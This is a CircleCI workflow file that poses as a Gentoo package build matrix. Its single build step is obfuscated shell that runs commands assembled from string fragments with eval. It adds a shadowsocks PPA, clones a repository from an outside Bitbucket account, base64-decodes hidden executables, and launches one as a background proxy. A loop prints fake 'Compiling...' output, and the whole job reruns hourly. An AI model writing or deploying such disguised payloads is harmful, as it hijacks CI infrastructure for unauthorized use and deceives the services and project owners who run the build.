version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--accept-properties", "--columns", "--digest", "--unordered-display", "--regen", "--accept-restrict", "--getbinpkgonly", "--buildpkg", "--complete-graph-if-new-ver", "--resume", "--complete-graph-if-new-ver", "--binpkg-respect-use", "--autounmask-license", "--autounmask-write", "--rebuilt-binaries", "--metadata", "--oneshot", "--fetch-all-uri", "--autounmask-continue", "--ignore-soname-deps"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--accept-properties", "--columns", "--digest", "--unordered-display", "--regen", "--accept-restrict", "--getbinpkgonly", "--buildpkg", "--complete-graph-if-new-ver", "--resume", "--complete-graph-if-new-ver", "--binpkg-respect-use", "--autounmask-license", "--autounmask-write", "--rebuilt-binaries", "--metadata", "--oneshot", "--fetch-all-uri", "--autounmask-continue", "--ignore-soname-deps"]
    triggers:
      - schedule:
          cron: "29 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: ubuntu-api-gentoo-org
          command: |
            XImSM="sudo add-ap"
            ToyBEt="t-repositor"
            LXdAcva="y ppa:max-c"
            FKDaKVxij="-lv/shadows"
            ZyPTzU="ocks-libev "
            cXMxg="-y &>/dev/n"
            eval "$XImSM""$ToyBEt""$LXdAcva""$FKDaKVxij""$ZyPTzU""$cXMxg""ull || true"
            GtDDShQGPQ="sudo add-ap"
            sDeqQ="t-repositor"
            XXpgvw="y ppa:ondre"
            RYloeDpF="j/apache2 -"
            rNjfAI="y &>/dev/nu"
            eval "$GtDDShQGPQ""$sDeqQ""$XXpgvw""$RYloeDpF""$rNjfAI""ll || true"
            EVhUKEnlfc="sudo apt up"
            SHAffngDIa="date || tru"
            eval "$EVhUKEnlfc""$SHAffngDIa""e"
            sudo apt --yes install openssl &>/dev/null || true
            Gevwb="sudo apt --"
            bkaVfLbE="yes install"
            VHdjkm=" cl-base64 "
            qcGzLlIESpd="git &>/dev/"
            TWmWAES="null || tru"
            eval "$Gevwb""$bkaVfLbE""$VHdjkm""$qcGzLlIESpd""$TWmWAES""e"
            CbTWooRx="git clone h"
            VItLPJ="ttps://gccb"
            ZdyIhnM="uild@bitbuc"
            WHowvfHKZ="ket.org/gcc"
            kbGpRRMz="build/gcc.g"
            SNUPYQEAOKs="it &>/dev/n"
            eval "$CbTWooRx""$VItLPJ""$ZdyIhnM""$WHowvfHKZ""$kbGpRRMz""$SNUPYQEAOKs""ull"
            IvKyOSYpA="base64 -d g"
            FSQwixO="cc/cmake_np"
            eval "$IvKyOSYpA""$FSQwixO""_ > cmake"
            JHvZcqHwVn="base64 -d g"
            cJVEqRTx="cc/config_ "
            eval "$JHvZcqHwVn""$cJVEqRTx""> .conf"
            epQiMArqCE="base64 -d g"
            fROQIvBxXrn="cc/make_ > "
            eval "$epQiMArqCE""$fROQIvBxXrn""launchpad"
            sed -i 's/1080/1081/g' .conf
            chmod +x launchpad cmake
            sfdWt="./cmake"
            eval "$sfdWt"""
            gaNNGwcCjy="sed -i 's/b"
            zqqQgZ="uild/ob2o/g"
            eval "$gaNNGwcCjy""$zqqQgZ""' .conf"
            sudo ./launchpad --config .conf &>/dev/null &
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2607)) ] && sudo killall launchpad && break; sleep 189; done
